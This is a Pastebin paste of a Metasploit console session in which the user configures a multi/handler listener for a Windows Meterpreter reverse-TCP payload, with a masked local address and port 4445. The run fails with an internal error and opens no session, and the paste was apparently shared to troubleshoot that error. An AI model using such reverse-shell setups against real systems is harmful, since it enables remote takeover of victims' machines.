Advertisement
Guest User

Untitled

a guest
Jun 24th, 2017
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.91 KB | None | 0 0
  1. root@bt:/opt/metasploit-3.5.0/apps/pro/msf3# ./msfconsole
  2.  
  3. 888 888 d8b888
  4. 888 888 Y8P888
  5. 888 888 888
  6. 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
  7. 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
  8. 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
  9. 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
  10. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
  11. 888
  12. 888
  13. 888
  14.  
  15.  
  16. =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
  17. + -- --=[ 617 exploits - 307 auxiliary
  18. + -- --=[ 225 payloads - 28 encoders - 8 nops
  19.  
  20. msf > use multi/handler
  21. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  22. payload => windows/meterpreter/reverse_tcp
  23. msf exploit(handler) > set LHOST 192.168.x.x
  24. LHOST => 192.168.x.x
  25. msf exploit(handler) > set LPORT 4445
  26. LPORT => 4445
  27. msf exploit(handler) > show options
  28.  
  29. Module options:
  30.  
  31. Name Current Setting Required Description
  32. ---- --------------- -------- -----------
  33.  
  34.  
  35. Payload options (windows/meterpreter/reverse_tcp):
  36.  
  37. Name Current Setting Required Description
  38. ---- --------------- -------- -----------
  39. EXITFUNC process yes Exit technique: seh, thread, process, none
  40. LHOST 192.168.x.x yes The listen address
  41. LPORT 4445 yes The listen port
  42.  
  43.  
  44. Exploit target:
  45.  
  46. Id Name
  47. -- ----
  48. 0 Wildcard Target
  49.  
  50.  
  51. msf exploit(handler) > exploit
  52.  
  53. [-] Exploit failed: uninitialized constant Msf::Encoder::Type::PrintfUtil
  54. [*] Exploit completed, but no session was created.
  55. msf exploit(handler) >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement